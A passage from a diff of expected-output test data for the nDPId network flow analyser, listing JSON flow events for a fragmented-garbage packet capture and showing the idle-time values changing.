-00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 